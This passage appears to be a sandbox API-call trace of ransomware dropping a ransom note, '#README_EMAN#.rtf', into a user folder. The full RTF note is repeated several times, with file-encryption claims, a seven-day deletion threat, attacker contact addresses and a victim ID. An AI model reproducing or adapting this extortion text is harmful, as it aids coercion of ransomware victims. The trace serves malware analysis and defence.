p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nûê9ÿâ\x8c\x9b\x8b­¹Åü\x03§#-*\n5\x90W\x1e\x1fc\x9e", lpUsedDefaultChar=0x0) returned 8717 [0295.899] WriteFile (in: hFile=0x2ec, lpBuffer=0x2358878*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2358878*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0295.900] CloseHandle (hObject=0x2ec) returned 1 [0295.900] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\tn-za\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\tn-za\\#readme_eman#.rtf")) returned 0xffffffff [0295.900] GetLastError () returned 0x2 [0295.900] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\tn-za\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\tn-za\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ec [0295.901] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0295.901] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0295.901] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2358878, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl 